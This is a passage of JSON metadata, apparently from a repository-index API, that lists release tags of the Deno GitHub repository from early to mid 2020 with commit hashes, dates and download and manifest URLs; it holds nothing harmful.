","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca5